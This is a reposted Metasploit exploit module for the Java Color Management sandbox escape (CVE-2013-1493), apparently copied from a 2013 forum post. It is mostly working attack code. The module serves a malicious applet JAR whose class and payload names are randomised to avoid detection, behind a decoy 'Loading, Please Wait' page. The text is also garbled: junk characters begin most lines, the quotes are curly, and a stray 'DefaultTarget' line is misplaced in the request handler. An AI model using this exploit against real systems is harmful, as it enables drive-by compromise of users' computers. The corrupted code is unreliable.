##1 U7 } Z, t0 [' E
7 C' g6 b$ c, s! \0 @
# This file is part of the Metasploit Framework and may be subject to, {2 B/ K( w4 D2 a
# redistribution and commercial restrictions. Please see the Metasploit
( {/ M$ B8 I7 d. y6 _" c# web site for more information on licensing and terms of use.
8 R" |8 x4 \' l Y) Q4 x# http://metasploit.com/8 E9 c2 d G2 _. a; ~
##
9 B, c; h3 e% v) p! f; Arequire ‘msf/core’
8 K% d2 a8 j/ o3 Y8 h' T9 xrequire ‘rex’
- H& o, n# k2 Dclass Metasploit3 < Msf::Exploit::Remote
4 d0 k3 V; I5 p' S( P% FRank = NormalRanking; m9 S4 ^6 q( E' }8 P0 }9 Q I
include Msf::Exploit::Remote::HttpServer::HTML
$ {4 ]& Y% ~& R) z# [$ E3 ainclude Msf::Exploit::EXE1 W* ]+ Q9 k1 O/ e
include Msf::Exploit::Remote::BrowserAutopwn5 p& M1 g2 k) F- _+ ?
autopwn_info({ :javascript => false })0 n/ n, Q2 q `2 {
def initialize( info = {} )/ h, v% N' W* Z+ b
super( update_info( info,
$ l% a# p8 ]" H; }3 E1 E‘Name’ => ‘Java CMM Remote Code Execution’,
5 |* ^( r/ ?4 M, Z, a& c! }0 D‘Description’ => %q{
1 X9 v5 K5 F0 oThis module abuses the Color Management classes from a Java Applet to run
- e7 x5 N0 d7 I7 U V' i3 parbitrary Java code outside of the sandbox as exploited in the wild in February
3 z- q. s& d+ L" c5 S! aand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
% C1 @% x1 u0 t& R' U4 tand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 j0 o8 Y' \! ^: o/ F
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java ?# r, I$ I" E# n; V3 z" C
warning in order to run the malicious applet.
6 u/ R M, M8 |; p& E" d},- y" U* T" w v( ]7 m/ T* \
‘License’ => MSF_LICENSE,
, n+ _* D, ? k6 p9 A‘Author’ =>7 p' p% l9 {' g$ |( M
'Unknown', # Vulnerability discovery and Exploit8 X/ v4 O, M( @, o" m1 n
'juan vazquez' # Metasploit module (just ported the published exploit)/ f8 y; `8 D' c) o" {, @# ^2 z
],
/ Z+ b' D+ k4 |! p0 h‘References’ =>; |- V/ U7 a2 o8 k7 d+ q1 W& ]
[
+ a) g, h- U( z. Z9 ^4 l# x. ^5 s[ 'CVE', '2013-1493' ],! @. a9 d: k1 N- I) F8 B6 r5 `9 H
[ 'OSVDB', '90737' ], c& Q; j( ~, [. `
[ 'BID', '58238' ],' f; `: d. o; y/ D9 M
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],7 u1 U; w7 \* y R- W& j' D3 _7 |
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],( E' p2 K" _, E: e0 q% B+ |
[ 'URL', 'http://pastie.org/pastes/6581034' ]- Q- @' o0 s# a& X0 `
],
5 x( k* x! K+ o o) s‘Platform’ => [ 'win', 'java' ],
. I6 W2 w- A3 h! x$ k3 p‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
( O( h2 p. a( R. Y F7 S‘Targets’ =>4 B/ D$ @! r; C- y
[
* W( s: p" N$ @+ O' x( B% b! Y[ 'Generic (Java Payload)',
+ E7 j1 L; h* I- ` a' m{
7 w/ L f6 a: h& R0 ^* v; L; x* ^'Platform' => 'java',) V4 E! j) g6 B% J: r! H
'Arch' => ARCH_JAVA# C+ b7 x9 a0 c2 m
}
R- h" l# ?; O2 Z% e],
7 Y% @# K$ h. E$ c7 X- W) B7 u; Q[ 'Windows x86 (Native Payload)',
$ @. } m# j [- c0 m: U" O{7 C: T. |$ p; ~( k4 k5 C( P) S2 L9 T
'Platform' => 'win',7 H- P9 J. i# B# u1 K0 B/ Q
'Arch' => ARCH_X86
1 |& w6 A0 G, L1 }0 t5 {}
3 w$ ?# W9 a2 R M: o]! s, X7 t$ ^) b. X- p
],
0 E3 h' A- Q5 p: o3 M‘‘DisclosureDate’ => ‘Mar 01 2013′
9 T1 R5 |! h2 Y) P1 d' A))
: X! t3 |% E9 A# H1 J3 u6 Iend
5 J" U3 H4 [- F$ F! d8 ?# h5 e3 adef setup
- H+ r0 \$ T6 e, l+ X: [2 l( \7 Tpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
8 R% ^. y4 h0 i( j. D@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }+ n+ t, U$ ~& D6 a# N& d( U
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
: u9 w4 U4 O* d$ t@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }- E5 H7 d& v5 j! t' y8 v
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)" @( R% A/ o' P! ^: _4 M
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }$ q7 g& c7 e% M
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
7 F* B( x: w' S, i: U; D@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }% ?1 j g5 I7 K# n% X, w( N/ [
@init_class_name = rand_text_alpha(“Init”.length)
9 H! P0 o6 P) w+ ~' a5 ^8 d@init_class.gsub!(“Init”, @init_class_name), _3 r* d$ s+ S4 Q8 M
super
8 B* F7 s$ T3 B; ?end
& n, p6 _! m0 S$ ddef on_request_uri(cli, request); _# L/ T6 ^# C, D
print_status(“handling request for #{request.uri}”)
, u' S5 T5 b# {case request.uri
5 S# P; j7 t- l- c0 ?' `when /\.jar$/i+ O. S2 v$ O) C- X
jar = payload.encoded_jar
$ @2 q' X' v% j* l/ g" }jar.add_file(“#{@init_class_name}.class”, @init_class)9 t) r* W7 v0 E: o% l8 |& _8 }& r
jar.add_file(“Leak.class”, @leak_class)
3 N7 G5 }% [, Kjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
/ l, J8 X' {6 m+ b/ Hjar.add_file(“MyColorSpace.class”, @color_space_class)( b7 R; z# q& L! x- t5 s
DefaultTarget’ => 1,
% J5 q& f e: h' z0 l+ K. ]metasploit_str = rand_text_alpha(“metasploit”.length)
5 z' u1 W2 I' N2 q" V- T/ opayload_str = rand_text_alpha(“payload”.length)
( V7 l6 ?( s, Fjar.entries.each { |entry|$ F8 q9 }! V: b; \, f3 }
entry.name.gsub!(“metasploit”, metasploit_str)0 _4 H( B6 T: a3 _9 P/ A
entry.name.gsub!(“Payload”, payload_str)
; Z# f7 z$ Z: J/ |, m9 d- s3 kentry.data = entry.data.gsub(“metasploit”, metasploit_str)
7 K1 r6 ~& y/ x2 Mentry.data = entry.data.gsub(“Payload”, payload_str)
* W z+ c% j0 K+ |# s1 c6 t; H}
) D2 i3 a: _4 n7 ~+ r1 r" njar.build_manifest1 G2 Q( m4 ?6 h- J1 V
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })$ [5 D9 o+ O8 h% ~* W# `1 E
when /\/$/
' a2 m3 ?" _$ B2 t$ G$ Gpayload = regenerate_payload(cli)
- s# W5 }+ |+ Aif not payload* t! W( g4 m! L; |2 J
print_error(“Failed to generate the payload.”)
' _. A7 N4 `0 I& `; n) lsend_not_found(cli)- ~4 Q& |5 U7 ^; }
return" `9 O( l) h) o' v r
end# ~2 j1 f, z, W
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
9 L8 O/ T- H/ ?5 s$ R( h' yelse
5 M( [2 m5 K$ P1 H( H5 c! lsend_redirect(cli, get_resource() + ‘/’, ”)4 a% b4 Z% }+ p |) O% [' B
end
$ e T) ~& p8 _1 Z( Tend
2 y3 O, k: x. q% ]* |2 I }def generate_html
) ^" p5 L" {, h# o* thtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|4 c! }; `: `+ b+ _) j3 l% d% {$ ?# \
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|! Z- N. ^; E% ?6 P( E$ Z4 Q; }
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
' Y. D+ D" x& V0 Y. ~html += %Q|</applet></body></html>|
! Q4 D7 V/ n3 }* {; Areturn html
' i3 M/ g" Y& s/ R! mend
% g: J% i1 _9 rend1 L- b. ?% M8 l
end
w0 ^. q! r; a0 r |
发表于 2013-4-4 17:31:17
收藏
支持
反对